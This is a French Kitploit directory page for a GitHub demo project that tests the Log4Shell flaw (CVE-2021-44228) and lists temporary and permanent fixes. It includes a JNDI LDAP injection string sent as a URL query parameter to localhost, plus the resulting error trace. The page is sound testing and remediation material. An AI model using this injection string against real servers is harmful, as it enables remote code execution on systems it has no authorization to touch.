Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
log4j2-issue-check — Projet de démonstration pour évaluer la vulnérabilité Log4j2 | CVE-2021-44228 | Kitploit
Outils/GitHubGitHub/sandarenu/log4j2-issue-check
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubsandarenu/log4j2-issue-check

log4j2-issue-check

Projet de démonstration pour évaluer la vulnérabilité Log4j2 | CVE-2021-44228

Voir le dépôt
1il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Évaluer la faille Log4Shell : RCE 0-day

Ce dépôt contient le code pour évaluer le problème Log4j2 CVE-2021-44228

Plus de détails

  • https://www.lunasec.io/docs/blog/log4j-zero-day/

Comment tester

Envoyez une requête GET avec le paramètre de requête ${jndi:ldap://127.0.0.1:3089/}.

root@kitploit:~
http://localhost:10000/test?userParam=%24%7Bjndi%3Aldap%3A%2F%2F127.0.0.1%3A3089%2F%7D

Lorsque la requête ci-dessus est envoyée, l'application tente de se connecter à l'URL ldap et l'erreur suivante est affichée, car elle n'est pas exécutée sur ma machine.

root@kitploit:~
2021-12-14 09:10:25,055 http-nio-10000-exec-1 WARN Error looking up JNDI resource [ldap://127.0.0.1:3089/]. javax.naming.CommunicationException: 127.0.0.1:3089 [Root exception is java.net.ConnectException: Connection refused (Connection refused)]
	at java.naming/com.sun.jndi.ldap.Connection.<init>(Connection.java:237)
	at java.naming/com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137)
	at java.naming/com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1610)
	at java.naming/com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2752)
	at java.naming/com.sun.jndi.ldap.LdapCtx.<init>(LdapCtx.java:320)
	at java.naming/com.sun.jndi.url.ldap.ldapURLContextFactory.getUsingURLIgnoreRootDN(ldapURLContextFactory.java:60)
	at java.naming/com.sun.jndi.url.ldap.ldapURLContext.getRootURLContext(ldapURLContext.java:61)
	at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:204)
	at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
	at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)
	at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)
	at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56)
	at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:221)

Correctif temporaire

Correctif 1

Si la version de log4j-core est >=2.10, la recherche JNDI peut être désactivée en ajoutant le paramètre JVM suivant.

root@kitploit:~
-Dlog4j2.formatMsgNoLookups=true

Correctif 2

Nous pouvons mettre à jour le fichier log4j2.xml avec {nolookups} dans le motif du message de log. Consultez la branche update-log4j2-config pour le correctif.

Correctif permanent

  • Mettez à jour la version de log4j vers 2.15.0. Consultez le correctif dans la branche update-log4j-to-2.15.0.
Télécharger l’outil